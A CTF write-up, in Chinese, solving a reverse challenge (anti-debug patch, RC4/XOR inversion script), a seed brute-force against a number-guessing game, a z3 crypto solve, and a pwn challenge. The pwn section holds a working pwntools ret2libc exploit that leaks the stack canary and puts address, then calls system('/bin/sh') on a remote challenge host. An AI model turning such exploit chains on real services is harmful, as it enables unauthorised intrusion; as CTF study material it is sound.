(没写几题,就记录一下,misc写的基本都是佬们打爆的几题,就不写了)
REVERSE
(如果有佬出了rust的flag,求佬告诉我一下orz,太菜了,没运行出来,验证不了flag,麻烦佬们告诉下orz)
ezre
观察程序,其中有base64、rc4、DES算法,
函数主要逻辑:输入一串字符,前一位和后一位异或,再rc4加密,最后des加密,DES算法给出了加密解密,0x65为加密,0x64为解密
根据动调来做,其中要注意的是tls函数对DES的密钥和输入的数据进行了改动
手动把两个tls函数判断是否调试的地方改一下,绕过反调试,
可以手动patch,也可以改ZF的值,
patch的话可以将74改成75,即可绕过反调试
输入flag{12345678901234567890123456789012}
调试到异或后,
取出数组十六进制数据为,
0A 0D 06 1C 4A 03 01 07 01 03 01 0F 01 09 01 03 01 07 01 03 01 0F 01 09 01 03 01 07 01 03 01 0F 01 09 01 03 4F 7D
经过rc4加密后数据为
3F D8 A0 03 BA 63 83 A7 C6 AC AD B2 D6 25 30 5B 83 88 96 C7 CE B9 22 AC 8D 1F 79 91 7E 73 38 F4 FC 98 CA A9 B7 D4
可用这两个异或,得到xor_key,
将此处的0x65改为0x64,并把最后判断的数组byte_40B078提取出来,
在des解密前,将byte_40B668的数据改为byte_EBB078的值
11 C3 77 FE 6F D2 EB F1 CF 1E 50 4D 70 4C 25 29
B5 CA 75 DB 8C 19 82 D9 1F E1 5E 58 EB 4B 51 D2
75 F4 BA 1F 61 0D 45 BD
通过解密后,得到
3F D8 A0 03 E9 63 D2 F2 97 FD A8 B9 87 7B 36 5F D0 8B 91 C5 99 E2 20 A6 DF 4A 2C 93 27 7E 3A F7 FD CD 97 AB BC D4
最后写个脚本逆推出flag
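def recover_flag(x1, x2, result):
    """Invert the ezre check chain (pairwise XOR -> RC4) from one known-plaintext run.

    Args:
        x1: the bytes of a chosen input after the pairwise-XOR step, as dumped
            in the debugger.
        x2: the same bytes after RC4. Because RC4 is a stream cipher,
            ``x1[i] ^ x2[i]`` is the keystream byte, and it is independent of
            the chosen input.
        result: the expected ciphertext with the DES layer already removed
            (the comparison array decrypted with the program's own DES routine).

    Returns:
        The input bytes that make the program produce ``result``.

    Raises:
        ValueError: if the three arrays do not have the same length.
    """
    if not len(x1) == len(x2) == len(result):
        raise ValueError("x1, x2 and result must have the same length")
    # Known plaintext ^ known ciphertext recovers the RC4 keystream.
    keystream = [a ^ b for a, b in zip(x1, x2)]
    # Strip the RC4 layer from the target.
    buf = [c ^ k for c, k in zip(result, keystream)]
    # The forward pass XORed each byte with its successor, leaving the last
    # byte untouched, so the inverse runs from the back using the already
    # restored successor.
    for i in range(len(buf) - 2, -1, -1):
        buf[i] ^= buf[i + 1]
    return bytes(buf)


# After the pairwise XOR, for input flag{12345678901234567890123456789012}.
x1 = [0x0A, 0x0D, 0x06, 0x1C, 0x4A, 0x03, 0x01, 0x07, 0x01, 0x03,
      0x01, 0x0F, 0x01, 0x09, 0x01, 0x03, 0x01, 0x07, 0x01, 0x03,
      0x01, 0x0F, 0x01, 0x09, 0x01, 0x03, 0x01, 0x07, 0x01, 0x03,
      0x01, 0x0F, 0x01, 0x09, 0x01, 0x03, 0x4F, 0x7D]
# The same buffer after RC4.
x2 = [0x3F, 0xD8, 0xA0, 0x03, 0xBA, 0x63, 0x83, 0xA7, 0xC6, 0xAC,
      0xAD, 0xB2, 0xD6, 0x25, 0x30, 0x5B, 0x83, 0x88, 0x96, 0xC7,
      0xCE, 0xB9, 0x22, 0xAC, 0x8D, 0x1F, 0x79, 0x91, 0x7E, 0x73,
      0x38, 0xF4, 0xFC, 0x98, 0xCA, 0xA9, 0xB7, 0xD4]
# The comparison array after DES decryption (0x64 mode).
result = [0x3F, 0xD8, 0xA0, 0x03, 0xE9, 0x63, 0xD2, 0xF2, 0x97, 0xFD,
          0xA8, 0xB9, 0x87, 0x7B, 0x36, 0x5F, 0xD0, 0x8B, 0x91, 0xC5,
          0x99, 0xE2, 0x20, 0xA6, 0xDF, 0x4A, 0x2C, 0x93, 0x27, 0x7E,
          0x3A, 0xF7, 0xFD, 0xCD, 0x97, 0xAB, 0xBC, 0xD4]

print(recover_flag(x1, x2, result))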
得到flag{ba1c3aea1faf4067a565f0da97488d89}
rev_randomize2
(赛后在本地复现出的,远程环境关了,不知道远程行不行,如果有误,轻点喷orz,方法比较烂,就硬爆随机数种子,有点废电脑,也有点看运气,随机数种子小的话,就很快)
代码主要逻辑,开始有初始分1000,猜对一个随机数加1分,再猜对一个加2分,依此类推,猜错的话,规律一样,当分数大于2000分,即可得到flag
sub_1289函数初始化随机数种子
sub_12FE获取生成的随机数
然后开跑,这里的libc.so.6是直接用pwn题给的libc,记得在本地建个flag文件,不然跑了半天出了才知道还没有文件(问就是我)
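from pwn import *
from ctypes import *

context.log_level = "debug"

# Seed window searched on the page; widen it if no seed reproduces the samples.
SEED_RANGE = range(0x10000000, 0x100000000)


def read_number(p):
    """Send one probe guess and return the number the game reveals afterwards.

    The game prints the value it had in mind after every guess, so a few
    probe guesses are enough to fingerprint the generator state.
    """
    p.recvuntil(b'Now guess!\n')
    p.sendline(b'1')
    p.recvuntil(b'The number in my mind is ')
    return int(p.recvuntil(b'\n')[:-1])


def find_seed(libc, samples, seeds=SEED_RANGE):
    """Return the first seed in `seeds` whose `rand() >> 15` stream starts with `samples`.

    `libc` is a ctypes handle to the same libc the target uses, so srand/rand
    behave identically. The `>> 15` mirrors how the game derives the shown
    number (the writeup's sub_12FE) — confirm against the binary if the
    search never matches. Returns None when no seed in the range matches.
    """
    for seed in seeds:
        libc.srand(seed)
        if all((libc.rand() >> 15) == sample for sample in samples):
            return seed
    return None


# p = remote('39.107.71.45', '25568')
p = process('./randomize')
elf = cdll.LoadLibrary('./libc.so.6')

samples = [read_number(p) for _ in range(3)]
for value in samples:
    print(value)

number = find_seed(elf, samples)
if number is None:
    # The original script crashed here with an unbound `number`; fail loudly.
    p.close()
    raise SystemExit("no seed in SEED_RANGE reproduced the three samples")
print(hex(number))

# Re-seed and consume the three values already observed so the local
# generator is in the same state as the game's.
elf.srand(number)
for _ in range(3):
    print(elf.rand() >> 15)

# Starting score 1000 minus 1+2+3 lost on the three probes (assumes all three
# probes were wrong, per the page's scoring rule); each correct guess then
# earns 1, 2, 3, ... in turn, and the flag is given above 2000.
score = 994
for i in range(100):
    payload = str(elf.rand() >> 15)
    p.sendline(payload.encode())
    score += i + 1
    if score >= 2000:
        break
    p.recvuntil(b'Now guess!\n')
p.interactive()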
CRYPTO
math
没有时间限制,就直接本地挨个解了,没写交互脚本
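import hashlib
import itertools
from string import digits, ascii_letters, punctuation

# Proof-of-work stage, solved once offline and kept for reference:
# find 4 printable characters whose sha256(xxxx + tail) equals the given digest.
# alpha_bet=digits+ascii_letters+punctuation
# strlist = itertools.product(alpha_bet, repeat=4)
# sha256="710dd6a2908fed2a9977445f021333d176f39060f3b14c8ebe73ab12d4946461"
# tail="QlRvhN1QqRksWBrG"
# xxxx=''
# for i in strlist:
#     data=i[0]+i[1]+i[2]+i[3]
#     data_sha=hashlib.sha256((data+str(tail)).encode('utf-8')).hexdigest()
#     if(data_sha==str(sha256)):
#         xxxx=data
#         break
# print(xxxx)

from z3 import *

# Values handed out by the challenge.
# pow(p,9)+pow(q,9):
P9_PLUS_Q9 = 2824822169624626054661488626925458420744715781080646942074253083493110409304139573698331220638806746185475842194119961243645804370254606328869920018072689414438851986763034645626556982418990163940800474549193470898195538208390077574728861492183878546810890489530709875694439708304188836872775133284206949916525601873082688977829638863138990316027434787047769932507784217745872371234159638863412009751336370516261263894787945468938670587885217215533551430379370918887017578135901512047635699889591590644728268209911213837545954673959103136577695532350503753325666353616999846273454813736702876968828262577312436890164868139215146941181825104314265142027185641195497429436701158821466597436322426101818844710031297488336024894303790150460476458932731090576824660354020881969224935848618388008509287249786048287099709905361669995934683044400119527112547308946141798312531702089592589519108535371095268166661526029944144811749355534331341058531140340843830280132820250819782775604064279338833095450886869781021370514423225666663969097910935332887127861068226704314810075641777615479058315604743490070494698514916318640565210625873112244649996112730726083223048152494260522865824835075057025248755461487069699219010214934196309822790800505679440651281428272245964425847552725070324370935048163205674057942566606069023173193117188785459966877961255640155226356782264373613291491124970651673222
# pow(p,3)+pow(q,3):
P3_PLUS_Q3 = 2170975452570130427181048521695873973135933481372313804498232310176782170227124595928130478815483294370924323759914604172695746976894120890757779825855362817255229290661676271054758017616180660951572648811631474401996380573736869074007533444837272191850638568203334900550339868176862783180156627459202829081595794230688694799962290853974633400675886602057846186352130394606371882689934371132063210289099864922945499792531454940004181032574377548535600071749073142

p, q = Ints('p q')
solver = Solver()  # z3 solver instance holding the two constraints
solver.add(pow(p, 9) + pow(q, 9) == P9_PLUS_Q9)
solver.add(pow(p, 3) + pow(q, 3) == P3_PLUS_Q3)
if solver.check() == sat:  # sat: a model satisfying both constraints exists
    ans = solver.model()  # concrete assignment for p and q
    p1 = ans[p].as_long()
    q1 = ans[q].as_long()
    print(ans)
    print(p1)
    print(q1)
    # The challenge answer. Computed only when a model exists; the original
    # printed it unconditionally and raised NameError on the "no ans!" path.
    print((p1 * q1) % (p1 + q1))
else:
    print("no ans!")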
PWN
ezstack
利用栈溢出和canary泄露的漏洞ret2libc
from pwn import *

# ezstack: stack overflow with a canary leak, finished as ret2libc (as the
# writeup describes). Everything below only works because the canary and a
# libc pointer can both be read back from the process; fixing the out-of-bounds
# input handling in the binary (presumably the root cause) removes both leaks.
context(arch="amd64", os="linux", log_level='debug')

binary = ELF("./pwn2")
libc = ELF("libc.so.6")
io = remote('123.56.175.221', '17322')

PUTS_PLT = binary.symbols["puts"]
PUTS_GOT = binary.got["puts"]
MAIN = binary.symbols["main"]
# Gadget addresses taken from the writeup (named rdi_addr / ret there);
# presumably `pop rdi; ret` and the trailing plain `ret`.
POP_RDI = 0x401363
RET = 0x401364

# Distance from the start of the input buffer to the stack canary, per the
# writeup's offsets.
BUF_TO_CANARY = 0x30 - 8


def overflow(canary, chain):
    """Build one overflowing input: padding, the leaked canary, a saved rbp, then `chain`."""
    return b'a' * BUF_TO_CANARY + p64(canary) + p64(0) + chain


# Stage 0: read the canary back. sendline appends '\n' to the 0x30-10 'a's and
# the 'b'; the 8 bytes echoed after 'b\n' are taken as the canary.
io.sendline(b'a' * (0x30 - 10) + b'b')
io.recvuntil(b'b\n')
canary = u64(io.recv(8))
print(hex(canary))

# Stage 1: puts(puts@got) to leak a libc address, then return to main for a
# second round of input.
leak_chain = p64(POP_RDI) + p64(PUTS_GOT) + p64(PUTS_PLT) + p64(MAIN)
io.sendlineafter(b'input: \n', overflow(canary, leak_chain))
leaked = io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')
puts_addr = u64(leaked)
print(hex(puts_addr))

# Rebase the provided libc on the leaked puts address.
base_addr = puts_addr - libc.sym['puts']
system_addr = base_addr + libc.sym['system']
binsh_addr = base_addr + next(libc.search(b'/bin/sh'))
print(hex(system_addr))
print(hex(binsh_addr))

# Stage 2: system("/bin/sh"), with the extra RET kept exactly as on the page.
shell_chain = p64(RET) + p64(POP_RDI) + p64(binsh_addr) + p64(system_addr)
io.sendlineafter(b'input: \n', overflow(canary, shell_chain))
io.interactive()
拿到权限后,得到flag,flag{nEsqteUbHFuy8mQTNXH7abj43C5Q4NQG}